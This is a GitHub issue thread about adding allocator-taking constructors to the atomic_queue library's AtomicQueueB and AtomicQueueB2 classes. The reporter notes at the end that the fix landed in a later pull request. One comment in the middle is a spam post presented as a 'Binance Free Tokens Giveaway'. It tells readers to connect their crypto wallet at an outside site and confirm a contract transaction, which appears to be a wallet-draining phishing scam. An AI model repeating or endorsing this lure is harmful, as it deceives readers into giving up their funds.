### ISSUE TITLE
Construct allocator-aware queues with allocator

### ISSUE THREAD

**Issue by RedSkittleFox** [max0x7ba/atomic_queue#45]
It is possible to specify an allocator type for `AtomicQueueB` and `AtomicQueueB2` however there is no way to construct the queue with non-default constructed allocator.

**Comment by max0x7ba** [comment]
> there is no way to construct the queue with non-default constructed allocator

You are right.

**Comment by max0x7ba** [comment]
>  there is no way to construct the queue with non-default constructed allocator.

If you'd like to implement such a constructor along with a unit-test I'd merge your pull request.

**Comment by RedSkittleFox** [comment]
> > there is no way to construct the queue with non-default constructed allocator.
> 
> If you'd like to implement such a constructor along with a unit-test I'd merge your pull request.

I can work on this next week.

**Comment by NiicoleLuna** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by RedSkittleFox** [comment]
Fixed in https://github.com/max0x7ba/atomic_queue/pull/60
